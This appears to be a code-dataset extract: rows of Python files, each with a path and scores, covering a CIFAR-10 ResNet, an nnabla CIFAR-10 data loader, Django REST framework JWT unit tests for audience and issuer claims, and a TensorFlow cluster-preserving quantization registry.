for attr, _ in six.iteritems(self.mx_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Member, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Member):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other | 0.543106 | 0.115511 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from .resnet import BasicBlock
class ResNet_cifar10_nofc(nn.Module):
def __init__(self, block, num_layers, num_classes=10):
super(ResNet_cifar10_nofc, self).__init__()
self.in_planes = 16
if (num_layers-2) % 6 == 0:
n = (num_layers-2)//6
num_blocks = [2*n, 2*n, 2*n]
else:
raise ValueError(
"no experiments done on num_layers {}, you can do it yourself".format(num_layers))
self.conv1 = nn.Conv2d(3, 16, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
# self.linear = nn.Linear(64*block.expansion, num_classes)
self.output_shape = [64*block.expansion]
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
# out = out / (out.norm() + self.eps) * self.scale
# out = self.linear(out)
return out
def ResNet20_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 20)
def ResNet32_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 32)
def ResNet44_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 44)
def ResNet56_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 56)
def ResNet110_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 110)
def ResNet1202_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 1202)
def test():
net = ResNet20_cifar10_nofc()
y = net(torch.randn(1, 3, 32, 32))
print(y.size())
# test() | models/resnet_cifar10_nofc.py | import torch
import torch.nn as nn
import torch.nn.functional as F
from .resnet import BasicBlock
class ResNet_cifar10_nofc(nn.Module):
def __init__(self, block, num_layers, num_classes=10):
super(ResNet_cifar10_nofc, self).__init__()
self.in_planes = 16
if (num_layers-2) % 6 == 0:
n = (num_layers-2)//6
num_blocks = [2*n, 2*n, 2*n]
else:
raise ValueError(
"no experiments done on num_layers {}, you can do it yourself".format(num_layers))
self.conv1 = nn.Conv2d(3, 16, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
# self.linear = nn.Linear(64*block.expansion, num_classes)
self.output_shape = [64*block.expansion]
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
# out = out / (out.norm() + self.eps) * self.scale
# out = self.linear(out)
return out
def ResNet20_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 20)
def ResNet32_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 32)
def ResNet44_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 44)
def ResNet56_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 56)
def ResNet110_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 110)
def ResNet1202_cifar10_nofc():
return ResNet_cifar10_nofc(BasicBlock, 1202)
def test():
net = ResNet20_cifar10_nofc()
y = net(torch.randn(1, 3, 32, 32))
print(y.size())
# test() | 0.911888 | 0.434581 |
import tarfile
from nnabla import random
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
import numpy as np
from sklearn.model_selection import train_test_split
from .dataloader import BaseDataLoader
from ..utils.data import transforms
def download_data(train=True):
data_uri = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
logger.info('Getting labeled data from {}.'.format(data_uri))
r = download(data_uri) # file object returned
with tarfile.open(fileobj=r, mode="r:gz") as fpin:
if train:
images = []
labels = []
for member in fpin.getmembers():
if "data_batch" not in member.name:
continue
fp = fpin.extractfile(member)
data = np.load(fp, encoding="bytes", allow_pickle=True)
images.append(data[b"data"])
labels.append(data[b"labels"])
size = 50000
images = np.concatenate(images).reshape(size, 3, 32, 32)
labels = np.concatenate(labels).reshape(-1, 1)
else:
for member in fpin.getmembers():
if "test_batch" not in member.name:
continue
fp = fpin.extractfile(member)
data = np.load(fp, encoding="bytes", allow_pickle=True)
images = data[b"data"].reshape(10000, 3, 32, 32)
labels = np.array(data[b"labels"]).reshape(-1, 1)
return (images, labels)
class CifarDataSource(DataSource):
def _get_data(self, position):
image = self._images[self._indexes[position]]
label = self._labels[self._indexes[position]]
return (image, label)
def __init__(self, images, labels, shuffle=False, rng=None):
super(CifarDataSource, self).__init__(shuffle=shuffle, rng=rng)
self._train = True
self._images = images
self._labels = labels
self._size = self._labels.size
self._variables = ('x', 'y')
if rng is None:
rng = np.random.RandomState(313)
self.rng = rng
self.reset()
def reset(self):
if self._shuffle:
self._indexes = self.rng.permutation(self._size)
else:
self._indexes = np.arange(self._size)
super(CifarDataSource, self).reset()
@property
def images(self):
"""Get copy of whole data with a shape of (N, 1, H, W)."""
return self._images.copy()
@property
def labels(self):
"""Get copy of whole label with a shape of (N, 1)."""
return self._labels.copy()
def get_data(train, comm, rng):
# download the data
images, labels = download_data(train)
n = len(labels)
if rng is None:
rng = random.prng
if train:
index = rng.permutation(n)
else:
index = np.arange(n)
num = n // comm.n_procs
selected_idx = index[num*comm.rank:num*(comm.rank + 1)]
return images[selected_idx], labels[selected_idx]
class DataLoader(BaseDataLoader):
r"""DataLoader for cifar10.
Args:
batch_size (int, optional): The mini-batch size. Defaults to 1.
searching (bool, optional): If `True`, the training data will be split into two parts.
First part will be used for training the model parameters. The second part will be
used to update the architecture parameters. Defaults to False.
training (bool, optional): Whether training is `True`. Defaults to False.
train_portion (float, optional): Portion of data is taken to use as training data. The rest
will be used for validation. Defaults to 1.0. This is only considered when searching is `True`.
rng (:obj:`numpy.random.RandomState`), optional): Numpy random number generator.
Defaults to None.
communicator (Communicator, optional): The communicator is used to support distributed
learning. Defaults to None.
"""
def __init__(self, batch_size=1, searching=False, training=False,
train_portion=1.0, rng=None, communicator=None):
rng = rng or random.prng
if searching:
images, labels = get_data(True, communicator, rng)
train_size = int(len(labels) * train_portion)
data = train_test_split(images, labels, stratify=labels,
train_size=train_size, random_state=rng)
idx = 0 if training else 1
X, y = data[idx], data[idx + 2]
else:
X, y = get_data(training, communicator, rng)
self._data = data_iterator(
CifarDataSource(X, y, shuffle=searching or training, rng=rng),
batch_size=batch_size,
rng=rng,
with_memory_cache=False,
with_file_cache=False
)
def __len__(self):
return self._data.size
def next(self):
x, y = self._data.next()
return {"inputs": [x], "targets": [y]}
def transform(self, key='train'):
r"""Return a transform applied to data augmentation."""
assert key in ('train', 'valid')
mean = (0.49139968, 0.48215827, 0.44653124)
std = (0.24703233, 0.24348505, 0.26158768)
scale = 1./255.0
pad_width = (4, 4, 4, 4)
if key == 'train':
return transforms.Compose([
transforms.Cutout(8, prob=1, seed=123),
transforms.Normalize(mean=mean, std=std, scale=scale),
transforms.RandomCrop((3, 32, 32), pad_width=pad_width),
transforms.RandomHorizontalFlip()
])
return transforms.Compose([
transforms.Normalize(mean=mean, std=std, scale=scale)
]) | nnabla_nas/dataset/cifar10.py |
import tarfile
from nnabla import random
from nnabla.logger import logger
from nnabla.utils.data_iterator import data_iterator
from nnabla.utils.data_source import DataSource
from nnabla.utils.data_source_loader import download
import numpy as np
from sklearn.model_selection import train_test_split
from .dataloader import BaseDataLoader
from ..utils.data import transforms
def download_data(train=True):
data_uri = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
logger.info('Getting labeled data from {}.'.format(data_uri))
r = download(data_uri) # file object returned
with tarfile.open(fileobj=r, mode="r:gz") as fpin:
if train:
images = []
labels = []
for member in fpin.getmembers():
if "data_batch" not in member.name:
continue
fp = fpin.extractfile(member)
data = np.load(fp, encoding="bytes", allow_pickle=True)
images.append(data[b"data"])
labels.append(data[b"labels"])
size = 50000
images = np.concatenate(images).reshape(size, 3, 32, 32)
labels = np.concatenate(labels).reshape(-1, 1)
else:
for member in fpin.getmembers():
if "test_batch" not in member.name:
continue
fp = fpin.extractfile(member)
data = np.load(fp, encoding="bytes", allow_pickle=True)
images = data[b"data"].reshape(10000, 3, 32, 32)
labels = np.array(data[b"labels"]).reshape(-1, 1)
return (images, labels)
class CifarDataSource(DataSource):
def _get_data(self, position):
image = self._images[self._indexes[position]]
label = self._labels[self._indexes[position]]
return (image, label)
def __init__(self, images, labels, shuffle=False, rng=None):
super(CifarDataSource, self).__init__(shuffle=shuffle, rng=rng)
self._train = True
self._images = images
self._labels = labels
self._size = self._labels.size
self._variables = ('x', 'y')
if rng is None:
rng = np.random.RandomState(313)
self.rng = rng
self.reset()
def reset(self):
if self._shuffle:
self._indexes = self.rng.permutation(self._size)
else:
self._indexes = np.arange(self._size)
super(CifarDataSource, self).reset()
@property
def images(self):
"""Get copy of whole data with a shape of (N, 1, H, W)."""
return self._images.copy()
@property
def labels(self):
"""Get copy of whole label with a shape of (N, 1)."""
return self._labels.copy()
def get_data(train, comm, rng):
# download the data
images, labels = download_data(train)
n = len(labels)
if rng is None:
rng = random.prng
if train:
index = rng.permutation(n)
else:
index = np.arange(n)
num = n // comm.n_procs
selected_idx = index[num*comm.rank:num*(comm.rank + 1)]
return images[selected_idx], labels[selected_idx]
class DataLoader(BaseDataLoader):
r"""DataLoader for cifar10.
Args:
batch_size (int, optional): The mini-batch size. Defaults to 1.
searching (bool, optional): If `True`, the training data will be split into two parts.
First part will be used for training the model parameters. The second part will be
used to update the architecture parameters. Defaults to False.
training (bool, optional): Whether training is `True`. Defaults to False.
train_portion (float, optional): Portion of data is taken to use as training data. The rest
will be used for validation. Defaults to 1.0. This is only considered when searching is `True`.
rng (:obj:`numpy.random.RandomState`), optional): Numpy random number generator.
Defaults to None.
communicator (Communicator, optional): The communicator is used to support distributed
learning. Defaults to None.
"""
def __init__(self, batch_size=1, searching=False, training=False,
train_portion=1.0, rng=None, communicator=None):
rng = rng or random.prng
if searching:
images, labels = get_data(True, communicator, rng)
train_size = int(len(labels) * train_portion)
data = train_test_split(images, labels, stratify=labels,
train_size=train_size, random_state=rng)
idx = 0 if training else 1
X, y = data[idx], data[idx + 2]
else:
X, y = get_data(training, communicator, rng)
self._data = data_iterator(
CifarDataSource(X, y, shuffle=searching or training, rng=rng),
batch_size=batch_size,
rng=rng,
with_memory_cache=False,
with_file_cache=False
)
def __len__(self):
return self._data.size
def next(self):
x, y = self._data.next()
return {"inputs": [x], "targets": [y]}
def transform(self, key='train'):
r"""Return a transform applied to data augmentation."""
assert key in ('train', 'valid')
mean = (0.49139968, 0.48215827, 0.44653124)
std = (0.24703233, 0.24348505, 0.26158768)
scale = 1./255.0
pad_width = (4, 4, 4, 4)
if key == 'train':
return transforms.Compose([
transforms.Cutout(8, prob=1, seed=123),
transforms.Normalize(mean=mean, std=std, scale=scale),
transforms.RandomCrop((3, 32, 32), pad_width=pad_width),
transforms.RandomHorizontalFlip()
])
return transforms.Compose([
transforms.Normalize(mean=mean, std=std, scale=scale)
]) | 0.81593 | 0.519765 |
import json
import base64
import jwt.exceptions
from django.test import TestCase
from rest_framework_jwt import utils
from rest_framework_jwt.compat import get_user_model
from rest_framework_jwt.settings import api_settings, DEFAULTS
User = get_user_model()
def base64url_decode(input):
rem = len(input) % 4
if rem > 0:
input += b'=' * (4 - rem)
return base64.urlsafe_b64decode(input)
class UtilsTests(TestCase):
def setUp(self):
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
def test_jwt_payload_handler(self):
payload = utils.jwt_payload_handler(self.user)
self.assertTrue(isinstance(payload, dict))
self.assertEqual(payload['username'], self.username)
self.assertTrue('exp' in payload)
def test_jwt_encode(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
payload_data = base64url_decode(token.split('.')[1].encode('utf-8'))
payload_from_token = json.loads(payload_data.decode('utf-8'))
self.assertEqual(payload_from_token, payload)
def test_jwt_decode(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def test_jwt_response_payload(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
response_data = utils.jwt_response_payload_handler(token)
self.assertEqual(response_data, dict(token=token))
def test_jwt_decode_verify_exp(self):
api_settings.JWT_VERIFY_EXPIRATION = False
payload = utils.jwt_payload_handler(self.user)
payload['exp'] = 1
token = utils.jwt_encode_handler(payload)
utils.jwt_decode_handler(token)
api_settings.JWT_VERIFY_EXPIRATION = True
class TestAudience(TestCase):
def setUp(self):
api_settings.JWT_AUDIENCE = 'my_aud'
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
return super(TestAudience, self).setUp()
def test_fail_audience_missing(self):
payload = utils.jwt_payload_handler(self.user)
del payload['aud']
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
utils.jwt_decode_handler(token)
def test_fail_audience_wrong(self):
payload = utils.jwt_payload_handler(self.user)
payload['aud'] = 'my_aud2'
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.InvalidAudienceError):
utils.jwt_decode_handler(token)
def test_correct_audience(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def tearDown(self):
api_settings.JWT_AUDIENCE = DEFAULTS['JWT_AUDIENCE']
class TestIssuer(TestCase):
def setUp(self):
api_settings.JWT_ISSUER = 'example.com'
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
return super(TestIssuer, self).setUp()
def test_fail_issuer_missing(self):
payload = utils.jwt_payload_handler(self.user)
del payload['iss']
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
utils.jwt_decode_handler(token)
def test_fail_issuer_wrong(self):
payload = utils.jwt_payload_handler(self.user)
payload['iss'] = 'example2.com'
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.InvalidIssuerError):
utils.jwt_decode_handler(token)
def test_correct_issuer(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def tearDown(self):
api_settings.JWT_ISSUER = DEFAULTS['JWT_ISSUER'] | tests/test_utils.py | import json
import base64
import jwt.exceptions
from django.test import TestCase
from rest_framework_jwt import utils
from rest_framework_jwt.compat import get_user_model
from rest_framework_jwt.settings import api_settings, DEFAULTS
User = get_user_model()
def base64url_decode(input):
rem = len(input) % 4
if rem > 0:
input += b'=' * (4 - rem)
return base64.urlsafe_b64decode(input)
class UtilsTests(TestCase):
def setUp(self):
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
def test_jwt_payload_handler(self):
payload = utils.jwt_payload_handler(self.user)
self.assertTrue(isinstance(payload, dict))
self.assertEqual(payload['username'], self.username)
self.assertTrue('exp' in payload)
def test_jwt_encode(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
payload_data = base64url_decode(token.split('.')[1].encode('utf-8'))
payload_from_token = json.loads(payload_data.decode('utf-8'))
self.assertEqual(payload_from_token, payload)
def test_jwt_decode(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def test_jwt_response_payload(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
response_data = utils.jwt_response_payload_handler(token)
self.assertEqual(response_data, dict(token=token))
def test_jwt_decode_verify_exp(self):
api_settings.JWT_VERIFY_EXPIRATION = False
payload = utils.jwt_payload_handler(self.user)
payload['exp'] = 1
token = utils.jwt_encode_handler(payload)
utils.jwt_decode_handler(token)
api_settings.JWT_VERIFY_EXPIRATION = True
class TestAudience(TestCase):
def setUp(self):
api_settings.JWT_AUDIENCE = 'my_aud'
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
return super(TestAudience, self).setUp()
def test_fail_audience_missing(self):
payload = utils.jwt_payload_handler(self.user)
del payload['aud']
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
utils.jwt_decode_handler(token)
def test_fail_audience_wrong(self):
payload = utils.jwt_payload_handler(self.user)
payload['aud'] = 'my_aud2'
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.InvalidAudienceError):
utils.jwt_decode_handler(token)
def test_correct_audience(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def tearDown(self):
api_settings.JWT_AUDIENCE = DEFAULTS['JWT_AUDIENCE']
class TestIssuer(TestCase):
def setUp(self):
api_settings.JWT_ISSUER = 'example.com'
self.username = 'jpueblo'
self.email = '<EMAIL>'
self.user = User.objects.create_user(self.username, self.email)
return super(TestIssuer, self).setUp()
def test_fail_issuer_missing(self):
payload = utils.jwt_payload_handler(self.user)
del payload['iss']
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
utils.jwt_decode_handler(token)
def test_fail_issuer_wrong(self):
payload = utils.jwt_payload_handler(self.user)
payload['iss'] = 'example2.com'
token = utils.jwt_encode_handler(payload)
with self.assertRaises(jwt.exceptions.InvalidIssuerError):
utils.jwt_decode_handler(token)
def test_correct_issuer(self):
payload = utils.jwt_payload_handler(self.user)
token = utils.jwt_encode_handler(payload)
decoded_payload = utils.jwt_decode_handler(token)
self.assertEqual(decoded_payload, payload)
def tearDown(self):
api_settings.JWT_ISSUER = DEFAULTS['JWT_ISSUER'] | 0.427994 | 0.149625 |
"""Registry responsible for built-in keras classes."""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow_model_optimization.python.core.clustering.keras import clustering_registry
from tensorflow_model_optimization.python.core.quantization.keras import quant_ops
from tensorflow_model_optimization.python.core.quantization.keras import quantizers
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantize_registry
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantizers
layers = tf.keras.layers
def get_unique(t):
"""Get unique values and lookup index from N-D tensor.
Args:
t: tensor
Returns:
unique value, lookup index (same shape as input tensor)
Example:
t:
([[1.0, 2.0],
[2.0, 3.0],
[3.0, 3.0],
[1.0, 2.0]]
)
uniques:
([1.0, 2.0, 3.0])
output final index:
([[0, 1],
[1, 2],
[2, 2],
[0, 1]]
)
"""
t_flatten = tf.reshape(t, shape=(-1,))
uniques, index = tf.unique(t_flatten)
return uniques, tf.reshape(index, shape=tf.shape(t))
class _ClusterPreserveInfo(object):
"""ClusterPreserveInfo."""
def __init__(self, weight_attrs, quantize_config_attrs):
"""ClusterPreserveInfo.
Args:
weight_attrs: list of cluster preservable weight attributes of layer.
quantize_config_attrs: list of quantization configuration class name.
"""
self.weight_attrs = weight_attrs
self.quantize_config_attrs = quantize_config_attrs
class ClusterPreserveQuantizeRegistry(object):
"""ClusterPreserveQuantizeRegistry for built-in keras layers."""
# The keys represent built-in keras layers; the first values represent the
# the variables within the layers which hold the kernel weights, second
# values represent the class name of quantization configuration for layers.
# This decide the weights of layers with quantization configurations are
# cluster preservable.
_LAYERS_CONFIG_MAP = {
layers.Conv2D:
_ClusterPreserveInfo(['kernel'], ['Default8BitConvQuantizeConfig']),
layers.Dense:
_ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# DepthwiseConv2D is supported with 8bit qat, but not with
# clustering, thus for DepthwiseConv2D CQAT,
# preserving clustered weights is disabled.
layers.DepthwiseConv2D:
_ClusterPreserveInfo(['depthwise_kernel'],
['Default8BitQuantizeConfig']),
# layers that are supported with clustering, but not yet with qat
# layers.Conv1D:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv2DTranspose:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv3D:
# _ClusterPreserveInfo(['kernel'], []),
# layers.Conv3DTranspose:
# _ClusterPreserveInfo(['kernel'], []),
# layers.LocallyConnected1D:
# _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# layers.LocallyConnected2D:
# _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
# SeparableConv need verify from 8bit qat
# layers.SeparableConv1D:
# _ClusterPreserveInfo(['pointwise_kernel'],
# ['Default8BitConvQuantizeConfig']),
# layers.SeparableConv2D:
# _ClusterPreserveInfo(['pointwise_kernel'],
# ['Default8BitConvQuantizeConfig']),
# Embedding need verify from 8bit qat
# layers.Embedding: _ClusterPreserveInfo(['embeddings'], []),
}
_DISABLE_CLUSTER_PRESERVE = frozenset({
layers.DepthwiseConv2D,
})
def __init__(self):
self._config_quantizer_map = {
'Default8BitQuantizeConfig':
ClusterPreserveDefault8BitWeightsQuantizer(),
'Default8BitConvQuantizeConfig':
ClusterPreserveDefault8BitConvWeightsQuantizer(),
}
@classmethod
def _no_trainable_weights(cls, layer):
"""Returns whether this layer has trainable weights.
Args:
layer: The layer to check for trainable weights.
Returns:
True/False whether the layer has trainable weights.
"""
return not layer.trainable_weights
@classmethod
def _disable_cluster_preserve(cls, layer):
"""Returns whether disable this layer for preserving clusters.
Args:
layer: The layer to check for disabling.
Returns:
True/False whether disabling this layer for preserving clusters.
"""
return layer.__class__ in cls._DISABLE_CLUSTER_PRESERVE
@classmethod
def supports(cls, layer):
"""Returns whether the registry supports this layer type.
Args:
layer: The layer to check for support.
Returns:
True/False whether the layer type is supported.
"""
# layers without trainable weights are consider supported,
# e.g., ReLU, Softmax, and AveragePooling2D.
if cls._no_trainable_weights(layer):
return True
if layer.__class__ in cls._LAYERS_CONFIG_MAP:
return True
return False
@classmethod
def _weight_names(cls, layer):
if cls._no_trainable_weights(layer):
return []
return cls._LAYERS_CONFIG_MAP[layer.__class__].weight_attrs
@classmethod
def get_cluster_preservable_weights(cls, layer):
"""Get cluster preservable weights from keras layer.
Args:
layer: instance of keras layer
Returns:
List of cluster preservable weights
"""
return [getattr(layer, weight) for weight in cls._weight_names(layer)]
@classmethod
def get_suppport_quantize_config_names(cls, layer):
"""Get class name of supported quantize config for layer.
Args:
layer: instance of keras layer
Returns:
List of supported quantize config class name.
"""
# layers without trainable weights don't need quantize_config for cqat
if cls._no_trainable_weights(layer):
return []
return cls._LAYERS_CONFIG_MAP[layer.__class__].quantize_config_attrs
def apply_cluster_preserve_quantize_config(self, layer, quantize_config):
"""Applies cluster-preserve weight quantizer.
Args:
layer: The layer to check for support.
quantize_config: quantization config for supporting cluster preservation
on clustered weights
Returns:
The quantize_config with addon cluster preserve weight_quantizer.
"""
if not self.supports(layer):
raise ValueError('Layer ' + str(layer.__class__) + ' is not supported.')
# Example: ReLU, Softmax, and AveragePooling2D (without trainable weights)
# DepthwiseConv2D (cluster_preserve is disabled)
if self._no_trainable_weights(layer) or self._disable_cluster_preserve(
layer):
return quantize_config
# Example: Conv2D, Dense layers
if quantize_config.__class__.__name__ in self._LAYERS_CONFIG_MAP[
layer.__class__].quantize_config_attrs:
quantize_config.weight_quantizer = self._config_quantizer_map[
quantize_config.__class__.__name__]
else:
raise ValueError('Configuration ' +
str(quantize_config.__class__.__name__) +
' is not supported for Layer ' + str(layer.__class__) +
'.')
return quantize_config
class Default8bitClusterPreserveQuantizeRegistry(
ClusterPreserveQuantizeRegistry):
"""Default 8 bit ClusterPreserveQuantizeRegistry."""
def get_quantize_config(self, layer):
"""Returns the quantization config with addon cluster preserve weight_quantizer for the given layer.
Args:
layer: input layer to return quantize config for.
Returns:
Returns the quantization config for cluster preserve weight_quantizer.
"""
quantize_config = (default_8bit_quantize_registry.
Default8BitQuantizeRegistry().
get_quantize_config(layer))
cluster_aware_quantize_config = super(
Default8bitClusterPreserveQuantizeRegistry,
self).apply_cluster_preserve_quantize_config(layer, quantize_config)
return cluster_aware_quantize_config
class ClusterPreserveDefaultWeightsQuantizer(quantizers.LastValueQuantizer):
"""Quantize weights while preserving clusters."""
def __init__(self, num_bits, per_axis, symmetric, narrow_range):
"""ClusterPreserveDefaultWeightsQuantizer.
Args:
num_bits: Number of bits for quantization
per_axis: Whether to apply per_axis quantization. The last dimension is
used as the axis.
symmetric: If true, use symmetric quantization limits instead of training
the minimum and maximum of each quantization range separately.
narrow_range: In case of 8 bits, narrow_range nudges the quantized range
to be [-127, 127] instead of [-128, 127]. This ensures symmetric
range has 0 as the centre.
"""
super(ClusterPreserveDefaultWeightsQuantizer, self).__init__(
num_bits=num_bits,
per_axis=per_axis,
symmetric=symmetric,
narrow_range=narrow_range,
)
def _build_clusters(self, name, layer):
"""Extract the cluster centroids and cluster indices from the pretrained clustered model.
Args:
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
A dictionary of the initial values of the
cluster centroids, cluster indices, original weights,
the pretrained flag for marking the first training
epoch, and weight name.
"""
weights = getattr(layer.layer, name)
centroids, lookup = get_unique(weights)
# Prepare trainable variables for the Keras graph
clst_centroids_tf = layer.add_weight(
'cluster_centroids_tf',
shape=centroids.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([centroids])[0]),
dtype=centroids.dtype,
trainable=True)
ori_weights_tf = layer.add_weight(
'ori_weights_vars_tf',
shape=weights.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([weights])[0]),
dtype=weights.dtype,
trainable=True)
# Get clustering implementation according to layer type
clustering_impl_cls = clustering_registry.ClusteringLookupRegistry().\
get_clustering_impl(layer.layer, name)
clustering_impl = clustering_impl_cls(clst_centroids_tf)
pulling_indices = tf.dtypes.cast(
clustering_impl.get_pulling_indices(ori_weights_tf),
lookup.dtype
)
pulling_indices_tf = layer.add_weight(
'pulling_indices_tf',
shape=lookup.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([pulling_indices])[0]),
dtype=lookup.dtype,
trainable=False)
for v in layer.weights:
if 'kernel' in v.name:
kernel = v
result = {
'cluster_centroids_tf': clst_centroids_tf,
'pulling_indices_tf': pulling_indices_tf,
'ori_weights_vars_tf': ori_weights_tf,
'weight_name': name,
'clst_impl': clustering_impl,
'set_kernel_weight': kernel,
}
return result
def build(self, tensor_shape, name, layer):
"""Extract centroids and indices to preserve weights clusters.
Args:
tensor_shape: Shape of weights which needs to be quantized.
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
Dictionary of centroids, indices and
quantization params, the dictionary will be passed
to __call__ function.
"""
# To get all the initial values from pretrained clustered model
result = self._build_clusters(name, layer)
result.update(
super(ClusterPreserveDefaultWeightsQuantizer,
self).build(tensor_shape, name, layer))
return result
def __call__(self, inputs, training, weights, **kwargs):
"""Apply cluster preserved quantization to the input tensor.
Args:
inputs: Input tensor (layer's weights) to be quantized.
training: Whether the graph is currently training.
weights: Dictionary of weights (params) the quantizer can use to
quantize the tensor (layer's weights). This contains the weights
created in the `build` function.
**kwargs: Additional variables which may be passed to the quantizer.
Returns:
quantized tensor.
"""
# update associations
if training:
weights['pulling_indices_tf'].assign(
tf.dtypes.cast(weights['clst_impl']
.get_pulling_indices(weights['ori_weights_vars_tf']),
weights['pulling_indices_tf'].dtype)
)
clustered_inputs = weights['clst_impl'].get_clustered_weight_forward(
weights['pulling_indices_tf'], weights['ori_weights_vars_tf']
)
weights['set_kernel_weight'].assign(clustered_inputs)
else:
clustered_inputs = inputs
return quant_ops.LastValueQuantize(
clustered_inputs,
weights['min_var'],
weights['max_var'],
is_training=training,
num_bits=self.num_bits,
per_channel=self.per_axis,
symmetric=self.symmetric,
narrow_range=self.narrow_range
)
class ClusterPreserveDefault8BitWeightsQuantizer(
ClusterPreserveDefaultWeightsQuantizer):
"""ClusterPreserveWeightsQuantizer for default 8bit weights."""
def __init__(self):
super(ClusterPreserveDefault8BitWeightsQuantizer,
self).__init__(num_bits=8,
per_axis=False,
symmetric=True,
narrow_range=True)
